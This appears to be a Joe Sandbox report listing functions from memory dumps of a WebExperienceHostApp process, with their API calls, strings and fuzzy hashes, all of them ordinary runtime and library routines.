Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: __strncnt$Info___lc_collate_cp_func___lc_locale_name_func_errnomemcmp
String ID:
API String ID: 3421985146-0
Opcode ID: 9a4f074f7fe3bee5cb6c30750c332483e251a416c8866ebaadee7a14ac30e426
Instruction ID: 15b20fd61cc438905f4172add495e81825b08e41eefea7bbe21683f46c06cc6f
Opcode Fuzzy Hash: 9a4f074f7fe3bee5cb6c30750c332483e251a416c8866ebaadee7a14ac30e426
Instruction Fuzzy Hash: FA21C275B0974786EB108F1AA4A1529B6A1FB88FD8F544135DA6D537F8CFBCE4018700

Function 00007FFDFBA7BAE0 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB00
___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB08
___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB11
__pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB2D

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_func
String ID:
API String ID: 3203701943-0
Opcode ID: e28adfae1c249bda0afd0f7cf76bd22d5b083521ec3e54fdc1464557419da4a5
Instruction ID: eb07c43081b56d47f8e15b5c30c287e8e934b251cef2be9785a86d51283a500b
Opcode Fuzzy Hash: e28adfae1c249bda0afd0f7cf76bd22d5b083521ec3e54fdc1464557419da4a5
Instruction Fuzzy Hash: 74010CB2F1575286DB458F79D521438B7A0FB98F487548235DD1E47368DB7CD0C18700

Function 00007FFDFBA424C8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDFBA42530

Strings

MOC, xrefs: 00007FFDFBA424EA
RCC, xrefs: 00007FFDFBA424F2
csm, xrefs: 00007FFDFBA424FA

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: malloc
String ID: MOC$RCC$csm
API String ID: 2803490479-2671469338
Opcode ID: 99de963a1fe55b9bd7a0891b46763f532adfc88203a95788734ee6b425dadccb
Instruction ID: d1b73f08eded6751ea1f7275317b8ae1c358eacd14ef8188e316e4f46c8a968d
Opcode Fuzzy Hash: 99de963a1fe55b9bd7a0891b46763f532adfc88203a95788734ee6b425dadccb
Instruction Fuzzy Hash: 91017561F1A303C6EB656E1191B4A7972A1AF58B84F289031D729076FDCEADEA418603

Function 00007FFDFBA4A4E0 Relevance: 6.0, APIs: 4, Instructions: 37fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA49CD0: CreateFile2.API-MS-WIN-CORE-FILE-L1-2-0 ref: 00007FFDFBA49D00

SetFilePointerEx.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFBA4A514
SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFBA4A523
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FFDFBA4A536
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFBA4A541

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: File$CloseCreateErrorFile2HandleLastPointer
String ID:
API String ID: 3074824862-0
Opcode ID: 0cd72fde80447eeb56bad4721d4aaa63301966e39746875d89a672b024a734dd
Instruction ID: cdea893386a904c9cd81794364a507e8853f2290ad36e3e103ff6cadc1d45522
Opcode Fuzzy Hash: 0cd72fde80447eeb56bad4721d4aaa63301966e39746875d89a672b024a734dd
Instruction Fuzzy Hash: FAF0D611B1A75382FB509765B572A2A3190AF49BF4BA44230ED3D43BF8DE9CD4518700

Function 00007FFDFBA6D4D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP ref: 00007FFDFBA6D63C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA6D729

Strings

0123456789-, xrefs: 00007FFDFBA6D574

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemcpy
String ID: 0123456789-
API String ID: 931391446-3850129594
Opcode ID: 7264b870818fb0f69d8a1a77900bcf26002443e7252339213ad7f73e304bd3b5
Instruction ID: 99db73fac68d3080e7b84293fe37c0a05830c9ed8c746146d824f9f8c8156c61
Opcode Fuzzy Hash: 7264b870818fb0f69d8a1a77900bcf26002443e7252339213ad7f73e304bd3b5
Instruction Fuzzy Hash: 23716D62B1AB5699EB00CFA5D4606AC3372EB48BC8F444136DE6D17BECDE78D54AC340

Function 00007FFDFBA6D240 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

swprintf_s.PGOCR ref: 00007FFDFBA6D2DD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA6D490

Strings

%.0Lf, xrefs: 00007FFDFBA6D2CD

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnswprintf_s
String ID: %.0Lf
API String ID: 296878162-1402515088
Opcode ID: 3b16c76f99806dfa4a0cf6affe3c77ff5d81f2a5c6144b3f11b4eac95df9b14a
Instruction ID: 11a371ac2771be511b2f6dc8815db7254ae14db45bfe04d2644dccd47d91eb82
Opcode Fuzzy Hash: 3b16c76f99806dfa4a0cf6affe3c77ff5d81f2a5c6144b3f11b4eac95df9b14a
Instruction Fuzzy Hash: 1171A062B0AB8299EB01CB65E4606AD7372EF84798F044132DEAD17BACDF7CD445C300

Function 00007FFDFBA6D760 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

swprintf_s.PGOCR ref: 00007FFDFBA6D7FD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA6D9B0

Strings

%.0Lf, xrefs: 00007FFDFBA6D7ED

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnswprintf_s
String ID: %.0Lf
API String ID: 296878162-1402515088
Opcode ID: b571ce2853cddf76524b4741eca339f0dced9dcfb565cacf30ea4cebfa2c42ba
Instruction ID: 337bd836e919ddf36f863ff6105e792ca10308a1a3c698723c8d9ca5d3205d38
Opcode Fuzzy Hash: b571ce2853cddf76524b4741eca339f0dced9dcfb565cacf30ea4cebfa2c42ba
Instruction Fuzzy Hash: E5718162B09B8289EB11CB65E4606AD73B2EF947D8F144132DEAD17BA9EF7CD045C340

Function 00007FFDFBA79990 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FFDFBA79999

Strings

invalid random_device value, xrefs: 00007FFDFBA799AC

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: rand_s
String ID: invalid random_device value
API String ID: 863162693-3926945683
Opcode ID: 5bf917cb6cc27b8f8c101cf21685ef46c4f3be592fb91b1d19001d2cd564a4a4
Instruction ID: f263fc42b5758d0779f051c989ddaa112356b925325bf9c195966ad1f5798e49
Opcode Fuzzy Hash: 5bf917cb6cc27b8f8c101cf21685ef46c4f3be592fb91b1d19001d2cd564a4a4
Instruction Fuzzy Hash: A951E622F1EE4795F3528B34E4719B97364FF55388F248733E52E265F9DF68A4928200

Function 00007FFE13204730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13206770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE132023AE), ref: 00007FFE1320677E

_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE13204806
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13204864

Strings

csm, xrefs: 00007FFE1320490A

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: abort$CreateFrameInfo
String ID: csm
API String ID: 2697087660-1018135373
Opcode ID: 809b0197d0f15b3009e55adb189ff641ea3fee3a4527357fb56d218a418e2097
Instruction ID: 193cefac8056120b13e0c052e38ee8730900173b24275d961f1273bf8db56726
Opcode Fuzzy Hash: 809b0197d0f15b3009e55adb189ff641ea3fee3a4527357fb56d218a418e2097
Instruction Fuzzy Hash: 98515E76618B818AD660AF16E44026E77B4FBD9BB4F104174EB8D27B75CF38E455CB00

Function 00007FFDFBA53440 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

WindowsCreateStringReference.API-MS-WIN-CORE-WINRT-STRING-L1-1-0 ref: 00007FFDFBA535E4
RoGetActivationFactory.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FFDFBA5361D

Strings

Windows.Foundation.Diagnostics.AsyncCausalityTracer, xrefs: 00007FFDFBA535DD

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ActivationCreateFactoryReferenceStringWindows
String ID: Windows.Foundation.Diagnostics.AsyncCausalityTracer
API String ID: 1966789792-167870777
Opcode ID: 7c7924330cc76eb3eba570e8f5a043d3487a3d96d7dca579302cae01b3451e79
Instruction ID: cdcb10ef004117c89e3534f1b7da715346d6ce1841e8b5489783802cbadd915b
Opcode Fuzzy Hash: 7c7924330cc76eb3eba570e8f5a043d3487a3d96d7dca579302cae01b3451e79
Instruction Fuzzy Hash: B4318521B2AA4782EB148B15D4657BA33A0FF85B88F544035DA6E477FDDFBDD6418300

Function 00007FFDFBA536D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA537E0
CoGetObjectContext.API-MS-WIN-CORE-COM-L1-1-0 ref: 00007FFDFBA53803

Strings

Context callback failed., xrefs: 00007FFDFBA537C3

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ContextExceptionObjectThrow
String ID: Context callback failed.
API String ID: 1677907432-1244723342
Opcode ID: e19a649699645cc43410b51faacb8ed42f9f502b8979f275351cd23fa70905b7
Instruction ID: b99c1152373e0dba52797c3c7b47b35b9abf6cc0f34c4d915df2e4e531e06a9d
Opcode Fuzzy Hash: e19a649699645cc43410b51faacb8ed42f9f502b8979f275351cd23fa70905b7
Instruction Fuzzy Hash: 7E3168A2B1AE0781EB54CF24E4A0B7933A4EB84B88F540031D66E466B8DFBCE584C740

Function 00007FFDFBA43280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFBA432B5

Part of subcall function 00007FFDFBA92B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA45AA8), ref: 00007FFDFBA92B36

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFDFBA457AA,?,?,?,00007FFDFBA443F8), ref: 00007FFDFBA432AE

Strings

ios_base::failbit set, xrefs: 00007FFDFBA432CE

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID: ios_base::failbit set
API String ID: 1934640635-3924258884
Opcode ID: 86b4e5238144139d03474f40a88081f60eccb49d5d50e335382d98dbc759b6c8
Instruction ID: 296380b3a342ea802dbe0992b2f3fd30421a73b40a1ca0dd9ba169c7c714ddcc
Opcode Fuzzy Hash: 86b4e5238144139d03474f40a88081f60eccb49d5d50e335382d98dbc759b6c8
Instruction Fuzzy Hash: 5C218621B0AF82D5DB60DB12A4506A9B2D4FB48BA0F544635EAAC43BF9DF7CD6458700

Function 00007FFE132098C8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE132099C6

Strings

void, xrefs: 00007FFE13209928
void , xrefs: 00007FFE13209950

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: void$void
API String ID: 2943138195-3746155364
Opcode ID: 1fd1239767cdba175521d54b038567421754ad18fe50b3a3e7fd3ac15f670715
Instruction ID: 43c5ceee9a7fbbab7c1bfb145c5e90c2ce159e5ace262d41af4723c630c84d49
Opcode Fuzzy Hash: 1fd1239767cdba175521d54b038567421754ad18fe50b3a3e7fd3ac15f670715
Instruction Fuzzy Hash: 74315C62F18F558CFB11EB66E8400EC37B0BB98768B440176DE8E62B69DF389148C740

Function 00007FFDFBA4F220 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFDFBA4C674), ref: 00007FFDFBA4F244

Part of subcall function 00007FFDFBA7BAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB00
Part of subcall function 00007FFDFBA7BAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB08
Part of subcall function 00007FFDFBA7BAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB11
Part of subcall function 00007FFDFBA7BAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB2D

Strings

true, xrefs: 00007FFDFBA4F2B3
false, xrefs: 00007FFDFBA4F29C

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconv
String ID: false$true
API String ID: 2502581279-2658103896
Opcode ID: 9b59a3e52013d521e33c9098de8e5753f24b95a6832a3519e6095e988c635fb6
Instruction ID: 6cfd2f250df05a43ddfe62698324e19e5fe9513e5bccd0bf1c4d05bb2b5cba97
Opcode Fuzzy Hash: 9b59a3e52013d521e33c9098de8e5753f24b95a6832a3519e6095e988c635fb6
Instruction Fuzzy Hash: 4021B13660AB8681E720DF20E0617AA77A0FB98798F840532DA9C033BDCF7CD251C780

Function 00007FFDFBA535A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

WindowsCreateStringReference.API-MS-WIN-CORE-WINRT-STRING-L1-1-0 ref: 00007FFDFBA535E4
RoGetActivationFactory.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FFDFBA5361D

Strings

Windows.Foundation.Diagnostics.AsyncCausalityTracer, xrefs: 00007FFDFBA535DD

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ActivationCreateFactoryReferenceStringWindows
String ID: Windows.Foundation.Diagnostics.AsyncCausalityTracer
API String ID: 1966789792-167870777
Opcode ID: 44bba69f27772335a2dabfed7dfb8568543d36035e0c3b799b1208cc61387a4d
Instruction ID: 8caa990bcfc6ccd9c5bffbaf45882fd40d348acf433e9baaa97758438820dfe6
Opcode Fuzzy Hash: 44bba69f27772335a2dabfed7dfb8568543d36035e0c3b799b1208cc61387a4d
Instruction Fuzzy Hash: AC215E22B1AF8682EB148B15E46577A33A0FB89B88F504136DA6D47BB9CFBDD545C300

Function 00007FFE1320608F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13206430: RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE13206474
Part of subcall function 00007FFE13206430: RaiseException.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFE132064BA

RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE132060FF

Strings

Access violation - no RTTI data!, xrefs: 00007FFE1320608F
Bad dynamic_cast!, xrefs: 00007FFE132060B2

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: FileHeader$ExceptionRaise
String ID: Access violation - no RTTI data!$Bad dynamic_cast!
API String ID: 3685223789-3176238549
Opcode ID: a6639cd7f69626a89f4ca9d3667c59b83a4044ca09e137da1a34bb00ff92109c
Instruction ID: 0fb8812295c5f10dcea3cbc161decc16e6589b7f65cf3717baace3b9c48f71ce
Opcode Fuzzy Hash: a6639cd7f69626a89f4ca9d3667c59b83a4044ca09e137da1a34bb00ff92109c
Instruction Fuzzy Hash: E4019261A29E0799EE50EB12E45117C6320FFE0B74F505071D54E1667AEF7CE508C300

Function 00007FFE1320E720 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1320E970: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1320EA30
Part of subcall function 00007FFE1320E970: RtlUnwindEx.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0(?,?,?,?,?,?,?,00007FFE1320E735), ref: 00007FFE1320EA7F

Part of subcall function 00007FFE13206770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE132023AE), ref: 00007FFE1320677E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1320E75A

Strings

f, xrefs: 00007FFE1320E735
csm, xrefs: 00007FFE1320E73B

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: CurrentImageNonwritableUnwindabortterminate
String ID: csm$f
API String ID: 4189928240-629598281
Opcode ID: 6b267538cdc2106bb9cc523324cb098b503f0df6c4cb79035cd1b191454f8ac5
Instruction ID: 485fd17685305fc6673d5f44d071c0ede4f9ffe5aa31dd87f72a43b4565b7dc8
Opcode Fuzzy Hash: 6b267538cdc2106bb9cc523324cb098b503f0df6c4cb79035cd1b191454f8ac5
Instruction Fuzzy Hash: F4E06C75D08F4245D7607B12A24513D66A4EFA57B4F244474D68C16676CE3CD8D4C641

Function 00007FFDFBA462E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDFBA462ED

Part of subcall function 00007FFDFBA44D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D32
